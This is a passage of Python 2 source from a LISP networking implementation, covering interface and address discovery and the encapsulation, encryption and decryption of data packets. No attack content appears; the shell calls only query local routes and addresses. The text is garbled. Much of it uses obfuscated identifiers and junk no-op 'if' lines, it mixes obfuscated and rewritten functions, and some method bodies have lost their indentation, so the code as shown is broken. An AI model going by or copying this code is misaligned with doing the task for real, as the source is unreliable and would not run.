    if ( lisp_mymacs . has_key ( oO ) ) : return ( lisp_mymacs [ oO ] , Iii11111iiI , oO , OOOoO00O )
    if ( OOOoO00O ) : return ( lisp_mymacs [ Iii11111iiI ] , Iii11111iiI , oO , OOOoO00O )
    return ( [ "?" ] , Iii11111iiI , oO , OOOoO00O )
if 87 - 87: IiII / I1Ii111 - Oo0Ooo
if 56 - 56: O0
if 45 - 45: OoOoOO00 - OoO0O00 - OoOoOO00
if 41 - 41: Oo0Ooo / i1IIi / Oo0Ooo - iII111i . o0oOOo0O0Ooo
if 65 - 65: O0 * i11iIiiIii . OoooooooOO / I1IiiI / iII111i
if 69 - 69: ooOoO0o % ooOoO0o
if 76 - 76: i11iIiiIii * iII111i / OoO0O00 % I1ii11iIi11i + OOooOOo
if 48 - 48: iIii1I11I1II1 % i1IIi + OoOoOO00 % o0oOOo0O0Ooo
def lisp_get_local_interfaces():
    """Create a lisp_interface entry for every local network device."""
    for device in netifaces.interfaces():
        interface = lisp_interface(device)
        interface.add_interface()
    return
if 96 - 96: oO0o - oO0o
if 87 - 87: Oo0Ooo / OoooooooOO - I1ii11iIi11i . IiII + iIii1I11I1II1 . I1ii11iIi11i
if 4 - 4: OoooooooOO + ooOoO0o . i1IIi / O0 - O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
if 71 - 71: I1Ii111 - o0oOOo0O0Ooo - OOooOOo
if 28 - 28: iIii1I11I1II1
def lisp_get_loopback_address():
    """Return the first IPv4 'peer' address on device "lo" that is not
    127.0.0.1, or None when only 127.0.0.1 is configured."""
    for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
        if (addr["peer"] != "127.0.0.1"):
            return (addr["peer"])
    return (None)
if 58 - 58: IiII / I11i + II111iiii % iII111i - OoooooooOO
if 25 - 25: OoOoOO00 % OoooooooOO * Oo0Ooo - i1IIi * II111iiii * oO0o
if 30 - 30: I11i % OoOoOO00 / I1ii11iIi11i * O0 * Ii1I . I1IiiI
if 46 - 46: OoOoOO00 - O0
if 70 - 70: I11i + Oo0Ooo * iIii1I11I1II1 . I1IiiI * I11i
if 49 - 49: o0oOOo0O0Ooo
if 25 - 25: iII111i . OoooooooOO * iIii1I11I1II1 . o0oOOo0O0Ooo / O0 + Ii1I
if 68 - 68: Oo0Ooo
def lisp_is_mac_string(mac_str):
    """Return True when *mac_str* looks like a dashed MAC address
    ("xxxx-xxxx-xxxx"), optionally followed by a "/prefix" suffix."""
    pieces = mac_str.split("/")
    mac = pieces[0] if len(pieces) == 2 else mac_str
    return (len(mac) == 14 and mac.count("-") == 2)
if 22 - 22: OOooOOo
if 22 - 22: iII111i * I11i - Oo0Ooo * O0 / i11iIiiIii
if 78 - 78: Oo0Ooo * O0 / ooOoO0o + OoooooooOO + OOooOOo
if 23 - 23: iII111i % OoooooooOO / iIii1I11I1II1 + I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
if 94 - 94: i1IIi
if 36 - 36: I1IiiI + Oo0Ooo
if 46 - 46: iII111i
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
def lisp_get_local_macs():
    """Populate the global lisp_mymacs table from the local interfaces.

    lisp_mymacs maps a MAC address (12 hex digits, separators removed)
    to the list of device names that own it.

    Fix: the original computed device.replace(":", "") and then discarded
    that result by recomputing device.replace("-", "") from the original
    name, so a device name containing both ":" and "-" was never fully
    normalized before the isalnum() screen. The replaces are now chained.
    """
    for device in netifaces.interfaces():
        #
        # Skip device names that are not alphanumeric once ":" and "-"
        # separators are removed.
        #
        name = device.replace(":", "").replace("-", "")
        if (name.isalnum() == False): continue

        #
        # Some devices return no address info at all -- skip them.
        #
        try:
            addresses = netifaces.ifaddresses(device)
        except:
            continue
        if (addresses.has_key(netifaces.AF_LINK) == False): continue

        mac = addresses[netifaces.AF_LINK][0]["addr"]
        mac = mac.replace(":", "")

        #
        # Skip short pseudo link-addresses; a real MAC is 12 hex digits.
        #
        if (len(mac) < 12): continue

        if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
        lisp_mymacs[mac].append(device)

    lprint("Local MACs are: {}".format(lisp_mymacs))
    return
if 26 - 26: OOooOOo * Oo0Ooo
if 31 - 31: I11i * oO0o . Ii1I
if 35 - 35: I11i
if 94 - 94: ooOoO0o / i11iIiiIii % O0
if 70 - 70: I11i - Oo0Ooo / OoooooooOO % OoooooooOO
if 95 - 95: OoooooooOO % OoooooooOO . Ii1I
if 26 - 26: oO0o + IiII - II111iiii . II111iiii + I1ii11iIi11i + OoOoOO00
if 68 - 68: O0
def lisp_get_local_rloc ( ) :
    """Return the IPv4 address of the default-route interface as a
    lisp_address; returns an empty-string lisp_address on any failure.

    Scrapes shell output: netstat to find the default-route device, then
    ifconfig (macOS) or `ip addr show` (Linux) to read its address.
    """
    o0oOoO00 = commands . getoutput ( "netstat -rn | egrep 'default|0.0.0.0'" )
    if ( o0oOoO00 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
    if 94 - 94: OoO0O00 + IiII + ooOoO0o
    if 82 - 82: Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + IiII % iIii1I11I1II1
    if 61 - 61: OOooOOo / Oo0Ooo % OOooOOo - OoO0O00 + ooOoO0o / ooOoO0o
    if 82 - 82: Oo0Ooo
    # Take the device name from the last column of the first route line.
    o0oOoO00 = o0oOoO00 . split ( "\n" ) [ 0 ]
    OO0oo00oOO = o0oOoO00 . split ( ) [ - 1 ]
    if 5 - 5: OoO0O00 / OoO0O00 - O0 - I1Ii111 + I1Ii111
    O0o00o000oO = ""
    O0oooOO0Oo0o = lisp_is_macos ( )
    if ( O0oooOO0Oo0o ) :
        o0oOoO00 = commands . getoutput ( "ifconfig {} | egrep 'inet '" . format ( OO0oo00oOO ) )
        if ( o0oOoO00 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
    else :
        OoOoOoo0OoO0 = 'ip addr show | egrep "inet " | egrep "{}"' . format ( OO0oo00oOO )
        o0oOoO00 = commands . getoutput ( OoOoOoo0OoO0 )
        # Fall back to a global address on loopback (used in some
        # container/VM setups) when the device itself shows none.
        if ( o0oOoO00 == "" ) :
            OoOoOoo0OoO0 = 'ip addr show | egrep "inet " | egrep "global lo"'
            o0oOoO00 = commands . getoutput ( OoOoOoo0OoO0 )
        if 17 - 17: Ii1I * II111iiii / IiII + iIii1I11I1II1 . I11i - O0
        if ( o0oOoO00 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
    if 70 - 70: Ii1I * oO0o - I11i + Oo0Ooo % I1ii11iIi11i - IiII
    if 81 - 81: O0 . O0
    if 75 - 75: iIii1I11I1II1 % IiII + I1ii11iIi11i * O0 . iII111i - ooOoO0o
    if 32 - 32: Ii1I % oO0o - i1IIi
    if 40 - 40: iIii1I11I1II1 + iII111i * OoOoOO00 + oO0o
    if 15 - 15: I11i % I1IiiI - iIii1I11I1II1 * ooOoO0o
    # Parse the address from the second column of the first 'inet' line;
    # on Linux, strip the CIDR "/len" suffix. The loop returns on its
    # first iteration, so only the first address is ever used.
    O0o00o000oO = ""
    o0oOoO00 = o0oOoO00 . split ( "\n" )
    if 71 - 71: OoOoOO00 % Oo0Ooo % ooOoO0o
    for I111 in o0oOoO00 :
        O0o00O0Oo0 = I111 . split ( ) [ 1 ]
        if ( O0oooOO0Oo0o == False ) : O0o00O0Oo0 = O0o00O0Oo0 . split ( "/" ) [ 0 ]
        III1 = lisp_address ( LISP_AFI_IPV4 , O0o00O0Oo0 , 32 , 0 )
        return ( III1 )
    if 66 - 66: o0oOOo0O0Ooo * OOooOOo + Ii1I * o0oOOo0O0Ooo + OOooOOo / OoooooooOO
    return ( lisp_address ( LISP_AFI_IPV4 , O0o00o000oO , 32 , 0 ) )
if 86 - 86: Ii1I . iII111i - iII111i
if 71 - 71: iIii1I11I1II1 . II111iiii % iIii1I11I1II1
if 22 - 22: i11iIiiIii % I1ii11iIi11i % ooOoO0o % ooOoO0o . OoO0O00
if 85 - 85: ooOoO0o . O0 / OOooOOo * ooOoO0o - OoO0O00 - i11iIiiIii
if 25 - 25: ooOoO0o % Oo0Ooo - OOooOOo
if 80 - 80: IiII % II111iiii - Oo0Ooo - iIii1I11I1II1
if 9 - 9: o0oOOo0O0Ooo % I1ii11iIi11i . I1ii11iIi11i
if 28 - 28: OoooooooOO % oO0o + I1ii11iIi11i + O0 . I1Ii111
if 80 - 80: i11iIiiIii % I1ii11iIi11i
if 54 - 54: o0oOOo0O0Ooo + I11i - iIii1I11I1II1 % ooOoO0o % IiII
if 19 - 19: I1ii11iIi11i / iIii1I11I1II1 % i1IIi . OoooooooOO
def lisp_get_local_addresses ( ) :
    """
    Discover the first usable IPv4 and IPv6 RLOCs on this system and store
    them in global lisp_myrlocs as the 3-element array [ipv4, ipv6, device].
    Returns True when an IPv4 RLOC was found, False otherwise.

    The environment variable LISP_ADDR_SELECT can steer the choice. It has
    the form "<device>", "<count>", or "<device>:<count>", where <count>
    selects the Nth qualifying address (1-based) on a device.
    """
    global lisp_myrlocs

    device_select = None
    address_count = 1
    env = os.getenv("LISP_ADDR_SELECT")
    if (env != None and env != ""):
        env = env.split(":")
        if (len(env) == 2):
            device_select = env[0]
            address_count = env[1]
        elif (env[0].isdigit()):
            address_count = env[0]
        else:
            device_select = env[0]
    address_count = 1 if (address_count == "") else int(address_count)

    rlocs = [None, None, None]
    rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
    iid = None

    for device in netifaces.interfaces():
        if (device_select != None and device_select != device): continue
        linkinfo = netifaces.ifaddresses(device)
        if (linkinfo == {}): continue

        iid = lisp_get_interface_instance_id(device, None)

        #
        # Take the Nth qualifying IPv4 address on this device, skipping
        # loopback, link-local, 0.0.0.0, and (unless the user pinned a
        # device) addresses that are really configured database EIDs.
        #
        if (netifaces.AF_INET in linkinfo):
            count = 0
            for entry in linkinfo[netifaces.AF_INET]:
                rloc4.store_address(entry["addr"])
                if (rloc4.is_ipv4_loopback()): continue
                if (rloc4.is_ipv4_link_local()): continue
                if (rloc4.address == 0): continue
                count += 1
                rloc4.instance_id = iid
                if (device_select == None and
                    lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
                rlocs[0] = rloc4
                if (count == address_count): break

        #
        # Same selection for IPv6, skipping link-local and loopback.
        #
        if (netifaces.AF_INET6 in linkinfo):
            count = 0
            for entry in linkinfo[netifaces.AF_INET6]:
                addr_str = entry["addr"]
                rloc6.store_address(addr_str)
                if (rloc6.is_ipv6_string_link_local(addr_str)): continue
                if (rloc6.is_ipv6_loopback()): continue
                count += 1
                rloc6.instance_id = iid
                if (device_select == None and
                    lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
                rlocs[1] = rloc6
                if (count == address_count): break

        #
        # An IPv4 RLOC is required; otherwise keep scanning devices.
        #
        if (rlocs[0] == None): continue
        rlocs[2] = device
        break

    v4_str = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
    v6_str = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
    device = rlocs[2] if rlocs[2] else "none"
    suffix = " (user selected)" if device_select != None else ""

    v4_str = red(v4_str, False)
    v6_str = red(v6_str, False)
    device = bold(device, False)
    lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}".format(v4_str, v6_str, device, suffix, iid))

    lisp_myrlocs = rlocs
    return((rlocs[0] != None))
def lisp_get_all_addresses ( ) :
    """
    Return a list of every unicast address string (IPv4 then IPv6, per
    device) assigned to this system, excluding IPv4 loopback, the IPv6
    loopback "::1", and IPv6 link-local ("fe80:") addresses.
    """
    address_list = []
    for device in netifaces.interfaces():
        # Some interfaces can disappear or refuse enumeration; skip them.
        try:
            entries = netifaces.ifaddresses(device)
        except:
            continue

        if (netifaces.AF_INET in entries):
            for entry in entries[netifaces.AF_INET]:
                addr = entry["addr"]
                if (addr.find("127.0.0.1") != -1): continue
                address_list.append(addr)

        if (netifaces.AF_INET6 in entries):
            for entry in entries[netifaces.AF_INET6]:
                addr = entry["addr"]
                if (addr == "::1"): continue
                if (addr[0:5] == "fe80:"): continue
                address_list.append(addr)

    return(address_list)
def lisp_get_all_multicast_rles ( ) :
    """
    Scan ./lisp.config for "rle-address =" lines and return the RLE
    addresses that are IPv4 multicast (first octet 224 through 239).
    Commented-out config lines (leading "#") are ignored.
    """
    rles = []
    output = commands.getoutput('egrep "rle-address =" ./lisp.config')
    if (output == ""): return(rles)

    for line in output.split("\n"):
        if (line[0] == "#"): continue
        rle = line.split("rle-address = ")[1]
        first_octet = int(rle.split(".")[0])
        if (first_octet >= 224 and first_octet < 240): rles.append(rle)
    return(rles)
class lisp_packet ( ) :
def __init__ ( self , packet ) :
self . outer_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . outer_tos = 0
self . outer_ttl = 0
self . udp_sport = 0
self . udp_dport = 0
self . udp_length = 0
self . udp_checksum = 0
self . inner_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_sport = 0
self . inner_dport = 0
self . lisp_header = lisp_data_header ( )
self . packet = packet
self . inner_version = 0
self . outer_version = 0
self . encap_port = LISP_DATA_PORT
self . inner_is_fragment = False
self . packet_error = ""
self . gleaned_dest = False
if 29 - 29: Ii1I / ooOoO0o % I11i
if 10 - 10: iIii1I11I1II1 % OoooooooOO % I1ii11iIi11i
    def encode ( self , nonce ) :
        """
        Prepend the full encapsulation onto self.packet: outer IP header,
        UDP header, and LISP data header, encrypting the payload first
        when data-plane security is enabled for the destination RLOC.
        Returns self on success, or None when no outer source address is
        set or the outer IP version is unsupported.
        """
        if 39 - 39: II111iiii * OoOoOO00 . O0 * I11i
        if 89 - 89: Ii1I - ooOoO0o . I11i - I1Ii111 - I1IiiI
        if 79 - 79: IiII + IiII + Ii1I
        if 39 - 39: O0 - OoooooooOO
        if 63 - 63: iIii1I11I1II1 % o0oOOo0O0Ooo * ooOoO0o
        # Cannot encapsulate until the outer (RLOC) source is known.
        if ( self . outer_source . is_null ( ) ) : return ( None )
        if 79 - 79: O0
        if 32 - 32: II111iiii . O0 + Ii1I / OoOoOO00 / IiII / OOooOOo
        if 15 - 15: I1ii11iIi11i
        if 4 - 4: IiII + iIii1I11I1II1 * iII111i + Oo0Ooo * o0oOOo0O0Ooo % II111iiii
        if 88 - 88: oO0o - i1IIi % i11iIiiIii % II111iiii * OoooooooOO
        if 40 - 40: Oo0Ooo
        # Choose the nonce for the LISP header: allocate a fresh one,
        # echo back a request-nonce, or reuse the supplied value.
        if ( nonce == None ) :
            self . lisp_header . nonce ( lisp_get_data_nonce ( ) )
        elif ( self . lisp_header . is_request_nonce ( nonce ) ) :
            self . lisp_header . request_nonce ( nonce )
        else :
            self . lisp_header . nonce ( nonce )
        if 47 - 47: OoOoOO00
        self . lisp_header . instance_id ( self . inner_dest . instance_id )
        if 65 - 65: O0 + I1Ii111 % Ii1I * I1IiiI / ooOoO0o / OoOoOO00
        if 71 - 71: i11iIiiIii / OoOoOO00 . oO0o
        if 33 - 33: oO0o
        if 39 - 39: OoO0O00 + O0 + ooOoO0o * II111iiii % O0 - O0
        if 41 - 41: IiII % o0oOOo0O0Ooo
        if 67 - 67: O0 % I1Ii111
        # Encrypt the payload when data-plane security is configured and
        # this is not instance-id 0xffffff; key_id stays 0 unless
        # encrypt() stamps a real key-id into the header.
        self . lisp_header . key_id ( 0 )
        III = ( self . lisp_header . get_instance_id ( ) == 0xffffff )
        if ( lisp_data_plane_security and III == False ) :
            # Encap crypto keys are indexed by "<rloc>:<port>".
            oOo0O = self . outer_dest . print_address_no_iid ( ) + ":" + str ( self . encap_port )
            if 48 - 48: OOooOOo . OOooOOo + i11iIiiIii + I1ii11iIi11i % O0
            if ( lisp_crypto_keys_by_rloc_encap . has_key ( oOo0O ) ) :
                O0000 = lisp_crypto_keys_by_rloc_encap [ oOo0O ]
                if ( O0000 [ 1 ] ) :
                    O0000 [ 1 ] . use_count += 1
                    ii1i1II , iiI1ii1IIiI = self . encrypt ( O0000 [ 1 ] , oOo0O )
                    # Only replace the payload if encryption succeeded.
                    if ( iiI1ii1IIiI ) : self . packet = ii1i1II
                    if 35 - 35: I1ii11iIi11i * iII111i . IiII . IiII - oO0o % OoOoOO00
                if 42 - 42: o0oOOo0O0Ooo - iIii1I11I1II1 % OoooooooOO
            if 43 - 43: o0oOOo0O0Ooo - Oo0Ooo
        if 85 - 85: II111iiii + I1Ii111 - ooOoO0o * iIii1I11I1II1 % oO0o
        if 62 - 62: Ii1I + O0 * OoO0O00
        if 59 - 59: II111iiii
        if 43 - 43: Oo0Ooo + OoooooooOO
        if 47 - 47: ooOoO0o
        # UDP header. Source port is the well-known data port for gleaned
        # destinations or non-default encap ports, a crypto ephemeral
        # port when configured, otherwise hash_packet() derives it from
        # the inner packet (presumably for ECMP spreading — see
        # hash_packet()).
        self . udp_checksum = 0
        if ( self . encap_port == LISP_DATA_PORT ) :
            if ( lisp_crypto_ephem_port == None ) :
                if ( self . gleaned_dest ) :
                    self . udp_sport = LISP_DATA_PORT
                else :
                    self . hash_packet ( )
                if 92 - 92: I11i % i11iIiiIii % Oo0Ooo
            else :
                self . udp_sport = lisp_crypto_ephem_port
            if 23 - 23: II111iiii * iII111i
        else :
            self . udp_sport = LISP_DATA_PORT
        if 80 - 80: I1Ii111 / i11iIiiIii + OoooooooOO
        self . udp_dport = self . encap_port
        # UDP length covers UDP header (8) + LISP data header (8).
        self . udp_length = len ( self . packet ) + 16
        if 38 - 38: I1ii11iIi11i % ooOoO0o + i1IIi * OoooooooOO * oO0o
        if 83 - 83: iIii1I11I1II1 - ooOoO0o - I1Ii111 / OoO0O00 - O0
        if 81 - 81: Ii1I - oO0o * I1ii11iIi11i / I1Ii111
        if 21 - 21: OoO0O00
        # Raw IPv4 sockets want the ports in network byte order; for IPv6
        # they are left in host order here.
        if ( self . outer_version == 4 ) :
            O0o0oOOO = socket . htons ( self . udp_sport )
            IIi11 = socket . htons ( self . udp_dport )
        else :
            O0o0oOOO = self . udp_sport
            IIi11 = self . udp_dport
        if 78 - 78: I1Ii111 / oO0o - iIii1I11I1II1 - OoOoOO00
        if 60 - 60: II111iiii
        # NOTE(review): this repeats the assignment made just above and
        # is redundant as written.
        IIi11 = socket . htons ( self . udp_dport ) if self . outer_version == 4 else self . udp_dport
        if 90 - 90: OoOoOO00
        if 37 - 37: OoOoOO00 + O0 . O0 * Oo0Ooo % I1Ii111 / iII111i
        O0OO0ooO00 = struct . pack ( "HHHH" , O0o0oOOO , IIi11 , socket . htons ( self . udp_length ) ,
            self . udp_checksum )
        if 18 - 18: OoooooooOO
        if 57 - 57: ooOoO0o . OoOoOO00 * o0oOOo0O0Ooo - OoooooooOO
        if 75 - 75: i11iIiiIii / o0oOOo0O0Ooo . IiII . i1IIi . i1IIi / I11i
        if 94 - 94: ooOoO0o + I1IiiI
        oOOOoo00oO = self . lisp_header . encode ( )
        if 59 - 59: Ii1I / OoOoOO00 * OoO0O00 * iII111i % oO0o
        if 61 - 61: Oo0Ooo - O0 - OoooooooOO
        if 4 - 4: II111iiii - oO0o % Oo0Ooo * i11iIiiIii
        if 18 - 18: Oo0Ooo % O0
        if 66 - 66: iIii1I11I1II1 % i11iIiiIii / I1IiiI
        # Outer IP header. IPv4 is built and checksummed here (fixed
        # ident 0xdfdf, DF bit 0x4000 set, protocol 17/UDP). For IPv6 an
        # empty placeholder is used — presumably the v6 outer header is
        # supplied by a later send path; TODO confirm.
        if ( self . outer_version == 4 ) :
            IIIIIiiI11i1 = socket . htons ( self . udp_length + 20 )
            Iii1I = socket . htons ( 0x4000 )
            ooo = struct . pack ( "BBHHHBBH" , 0x45 , self . outer_tos , IIIIIiiI11i1 , 0xdfdf ,
                Iii1I , self . outer_ttl , 17 , 0 )
            ooo += self . outer_source . pack_address ( )
            ooo += self . outer_dest . pack_address ( )
            ooo = lisp_ip_checksum ( ooo )
        elif ( self . outer_version == 6 ) :
            ooo = ""
            if 39 - 39: oO0o / ooOoO0o * II111iiii * iII111i
            if 41 - 41: i11iIiiIii * O0 - iII111i . II111iiii % OoO0O00 % I1ii11iIi11i
            if 32 - 32: OOooOOo + iII111i + iIii1I11I1II1 * Oo0Ooo
            if 62 - 62: i11iIiiIii
            if 2 - 2: I1IiiI
            if 69 - 69: OoooooooOO / Oo0Ooo * I1Ii111
            if 99 - 99: II111iiii * iIii1I11I1II1 % O0 * oO0o / II111iiii % OoooooooOO
        else :
            return ( None )
        if 14 - 14: IiII . IiII % ooOoO0o
        if 42 - 42: o0oOOo0O0Ooo . OOooOOo - ooOoO0o
        # Final packet: outer IP + UDP + LISP header + (possibly
        # encrypted) payload.
        self . packet = ooo + O0OO0ooO00 + oOOOoo00oO + self . packet
        return ( self )
if 33 - 33: II111iiii / O0 / IiII - I11i - i1IIi
if 8 - 8: i11iIiiIii . iII111i / iIii1I11I1II1 / I1ii11iIi11i / IiII - Ii1I
def cipher_pad ( self , packet ) :
iI1 = len ( packet )
if ( ( iI1 % 16 ) != 0 ) :
i1I1iiii1Ii11 = ( ( iI1 / 16 ) + 1 ) * 16
packet = packet . ljust ( i1I1iiii1Ii11 )
if 25 - 25: i11iIiiIii / OoOoOO00 - I1Ii111 / OoO0O00 . o0oOOo0O0Ooo . o0oOOo0O0Ooo
return ( packet )
if 6 - 6: oO0o . I11i
if 43 - 43: I1ii11iIi11i + o0oOOo0O0Ooo
    def encrypt ( self , key , addr_str ) :
        """
        Encrypt self.packet with the negotiated per-RLOC key and append
        an integrity check value. Returns [ciphertext, True] on success
        where ciphertext is IV + encrypted-payload + ICV, or
        [self.packet, False] when no usable key exists or encryption
        fails. Also stamps the key-id into the LISP data header.
        """
        if ( key == None or key . shared_key == None ) :
            return ( [ self . packet , False ] )
        if 50 - 50: oO0o % i1IIi * O0
        if 4 - 4: iIii1I11I1II1 . i1IIi
        if 63 - 63: iIii1I11I1II1 + IiII % i1IIi / I1IiiI % II111iiii
        if 60 - 60: o0oOOo0O0Ooo . OoOoOO00 % I1Ii111 / I1IiiI / O0
        if 19 - 19: i11iIiiIii . I1IiiI + II111iiii / OOooOOo . I1ii11iIi11i * ooOoO0o
        # Pad plaintext to the cipher block size and get a fresh IV.
        ii1i1II = self . cipher_pad ( self . packet )
        oo0O = key . get_iv ( )
        if 100 - 100: OoooooooOO - O0 . I11i / I11i + II111iiii * OoOoOO00
        # Select the encrypt function for the key's cipher suite. Only
        # AES-GCM supplies a digest function (appended after encrypting).
        Oo0OO0000oooo = lisp_get_timestamp ( )
        i11111 = None
        if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
            o0o00OoOo0 = chacha . ChaCha ( key . encrypt_key , oo0O ) . encrypt
        elif ( key . cipher_suite == LISP_CS_25519_GCM ) :
            oo0O0000O0 = binascii . unhexlify ( key . encrypt_key )
            try :
                o0OO0ooOOO = AES . new ( oo0O0000O0 , AES . MODE_GCM , oo0O )
                o0o00OoOo0 = o0OO0ooOOO . encrypt
                i11111 = o0OO0ooOOO . digest
            except :
                lprint ( "You need AES-GCM, do a 'pip install pycryptodome'" )
                return ( [ self . packet , False ] )
            if 44 - 44: Ii1I * ooOoO0o / OoOoOO00
        else :
            oo0O0000O0 = binascii . unhexlify ( key . encrypt_key )
            o0o00OoOo0 = AES . new ( oo0O0000O0 , AES . MODE_CBC , oo0O ) . encrypt
        if 69 - 69: ooOoO0o . OOooOOo - I1IiiI
        if 29 - 29: i11iIiiIii . I1ii11iIi11i / I1IiiI . OOooOOo + i11iIiiIii
        i1I1i = o0o00OoOo0 ( ii1i1II )
        if 9 - 9: OoooooooOO * I1ii11iIi11i
        if ( i1I1i == None ) : return ( [ self . packet , False ] )
        # Elapsed encrypt time taken from the fractional seconds (usec).
        Oo0OO0000oooo = int ( str ( time . time ( ) - Oo0OO0000oooo ) . split ( "." ) [ 1 ] [ 0 : 6 ] )
        if 9 - 9: Oo0Ooo + iII111i
        if 64 - 64: O0 * I1IiiI / I1IiiI
        if 57 - 57: I1ii11iIi11i / OoooooooOO % I1ii11iIi11i . O0 / I1ii11iIi11i
        if 63 - 63: IiII + iIii1I11I1II1 + I1IiiI + I1Ii111
        if 72 - 72: OoO0O00 + i11iIiiIii + I1ii11iIi11i
        if 96 - 96: oO0o % i1IIi / o0oOOo0O0Ooo
        # For GCM, append the authentication tag to the ciphertext.
        if ( i11111 != None ) : i1I1i += i11111 ( )
        if 13 - 13: II111iiii - Oo0Ooo % i11iIiiIii + iII111i
        if 88 - 88: O0 . oO0o % I1IiiI
        if 10 - 10: I1IiiI + O0
        if 75 - 75: O0 % iIii1I11I1II1 / OoOoOO00 % OOooOOo / IiII
        if 31 - 31: i11iIiiIii * OoOoOO00
        # Compute the ICV over LISP-header + IV + ciphertext, using the
        # re-encoded header that now carries the real key-id.
        self . lisp_header . key_id ( key . key_id )
        oOOOoo00oO = self . lisp_header . encode ( )
        if 69 - 69: i11iIiiIii
        ooO = key . do_icv ( oOOOoo00oO + oo0O + i1I1i , oo0O )
        if 84 - 84: iIii1I11I1II1 . ooOoO0o + iII111i
        # Number of hex digits shown from each end of the ICV in logs.
        O00OOOo0Oo0 = 4 if ( key . do_poly ) else 8
        if 55 - 55: OOooOOo / OoOoOO00 * OOooOOo
        IIIiiiI1Ii1 = bold ( "Encrypt" , False )
        oo0O0OO0Oo = bold ( key . cipher_suite_string , False )
        addr_str = "RLOC: " + red ( addr_str , False )
        oO00o0oO0O = "poly" if key . do_poly else "sha256"
        oO00o0oO0O = bold ( oO00o0oO0O , False )
        iI11Iii1I = "ICV({}): 0x{}...{}" . format ( oO00o0oO0O , ooO [ 0 : O00OOOo0Oo0 ] , ooO [ - O00OOOo0Oo0 : : ] )
        dprint ( "{} for key-id: {}, {}, {}, {}-time: {} usec" . format ( IIIiiiI1Ii1 , key . key_id , addr_str , iI11Iii1I , oo0O0OO0Oo , Oo0OO0000oooo ) )
        if 62 - 62: IiII . O0 . iIii1I11I1II1
        if 94 - 94: ooOoO0o % I11i % i1IIi
        # Pack the hex ICV into wire format: poly1305 gives a 128-bit
        # value (two 64-bit words), sha256 is truncated to 160 bits
        # (two 64-bit words plus a 32-bit word).
        ooO = int ( ooO , 16 )
        if ( key . do_poly ) :
            o0OoOo0o0O00 = byte_swap_64 ( ( ooO >> 64 ) & LISP_8_64_MASK )
            I1IiiIi11 = byte_swap_64 ( ooO & LISP_8_64_MASK )
            ooO = struct . pack ( "QQ" , o0OoOo0o0O00 , I1IiiIi11 )
        else :
            o0OoOo0o0O00 = byte_swap_64 ( ( ooO >> 96 ) & LISP_8_64_MASK )
            I1IiiIi11 = byte_swap_64 ( ( ooO >> 32 ) & LISP_8_64_MASK )
            I1i11IIIi = socket . htonl ( ooO & 0xffffffff )
            ooO = struct . pack ( "QQI" , o0OoOo0o0O00 , I1IiiIi11 , I1i11IIIi )
        if 19 - 19: oO0o * iII111i + OoOoOO00 - oO0o + I1ii11iIi11i
        if 14 - 14: OoO0O00
        return ( [ oo0O + i1I1i + ooO , True ] )
if 38 - 38: O0
if 79 - 79: i1IIi . oO0o
    def decrypt ( self , packet , header_length , key , addr_str ) :
        """
        Authenticate and decrypt one encrypted LISP payload. packet is
        IV + ciphertext + trailing ICV; header_length is the length of
        the outer headers to retain in self.packet. Returns
        [plaintext, True] on success or [None, False] on ICV mismatch or
        decryption failure (self.packet_error records the reason).
        """
        if 34 - 34: I1Ii111 * II111iiii
        if 71 - 71: IiII
        if 97 - 97: I1ii11iIi11i
        if 86 - 86: Oo0Ooo - OOooOOo . OoOoOO00 . II111iiii * I1IiiI . II111iiii
        if 34 - 34: o0oOOo0O0Ooo . I1Ii111 % IiII - O0 / I1Ii111
        if 91 - 91: i11iIiiIii % I1Ii111 * oO0o - I1ii11iIi11i . I1Ii111
        # Strip and normalize the trailing ICV: poly1305 is the last 16
        # bytes (128 bits), sha256 the last 20 bytes (160 bits). The
        # words are byte-swapped back and rendered as a zero-filled hex
        # string for comparison with do_icv()'s output.
        if ( key . do_poly ) :
            o0OoOo0o0O00 , I1IiiIi11 = struct . unpack ( "QQ" , packet [ - 16 : : ] )
            iI = byte_swap_64 ( o0OoOo0o0O00 ) << 64
            iI |= byte_swap_64 ( I1IiiIi11 )
            iI = lisp_hex_string ( iI ) . zfill ( 32 )
            packet = packet [ 0 : - 16 ]
            O00OOOo0Oo0 = 4
            o00oo = bold ( "poly" , False )
        else :
            o0OoOo0o0O00 , I1IiiIi11 , I1i11IIIi = struct . unpack ( "QQI" , packet [ - 20 : : ] )
            iI = byte_swap_64 ( o0OoOo0o0O00 ) << 96
            iI |= byte_swap_64 ( I1IiiIi11 ) << 32
            iI |= socket . htonl ( I1i11IIIi )
            iI = lisp_hex_string ( iI ) . zfill ( 40 )
            packet = packet [ 0 : - 20 ]
            O00OOOo0Oo0 = 8
            o00oo = bold ( "sha" , False )
        if 78 - 78: IiII - I11i % O0 - OOooOOo % OoO0O00
        oOOOoo00oO = self . lisp_header . encode ( )
        if 43 - 43: OoO0O00
        if 90 - 90: OoooooooOO + O0 + I1ii11iIi11i / I11i / Ii1I * I1ii11iIi11i
        if 100 - 100: I11i
        if 82 - 82: iIii1I11I1II1
        # IV length at the front of the packet depends on cipher suite.
        if ( key . cipher_suite == LISP_CS_25519_CHACHA ) :
            iIiiII = 8
            oo0O0OO0Oo = bold ( "chacha" , False )
